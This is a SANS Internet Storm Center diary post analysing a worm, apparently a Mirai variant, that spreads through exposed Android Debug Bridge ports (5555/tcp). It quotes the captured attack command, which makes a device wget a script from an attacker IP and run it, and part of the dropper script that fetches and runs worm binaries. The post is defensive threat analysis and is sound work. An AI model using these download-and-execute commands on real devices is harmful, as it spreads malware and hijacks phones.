Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Worm (Mirai?) Exploiting Android Debug Bridge (Port 5555/tcp) SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms:

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Worm (Mirai?) Exploiting Android Debug Bridge (Port 5555/tcp)

Today, I noticed a marked increase in port 5555 scans.

Port 5555 Traffic July 10th 2018

Our honeypot detected odd traffic on this port:

OPEN]+shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95 .215 .62.169/adbs -O -> adbs; sh adbs; rm adbs

Note that our honeypot has a web server listening on this port, so it is not going to respond to this sequence. As it turns out, this command is directed at the Android Debug Bridge, an optional feature in the Android operating system. Recently, researchers discovered that this feature appears to be enabled on some Android phones [1]. The feature does allow for full shell access to the phone, and the above command may be executed.

The initial script downloaded:



for a in $n
    cp /system/bin/sh $a
    busybox wget http://$http_server/adb/$a -O -> $a
    chmod 777 $a

for a in $n
    rm $a

Which then downloads the actual "worm" for various platforms and attempts to run them. A quick analysis of the file via virus total suggests that this is a Mirai variant [2]. 

The initial download URL appears to be hardcoded into the binary. It does not look like it turns the infected system into a web server to spread the malware. Instead, it just refers to, a data center in Spain (the network was notified via and

Shortly after I downloaded the first binary, the web server became unresponsive. I am not sure if this is due to high load, or due to the ISP taking down the site. Virustotal has seen related binaries from this host since at least June. Christian Dietrich uploaded a similar binary on June 21st that was received via the more "traditional" telnet attack Mirai uses [3].


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

I will be teaching next: Defending Web Applications Security Essentials - SANS Cyber Defense Initiative 2021


4302 Posts
ISC Handler
Jul 10th 2018
See also more detailled information on:

Sign Up for Free or Log In to start participating in the conversation!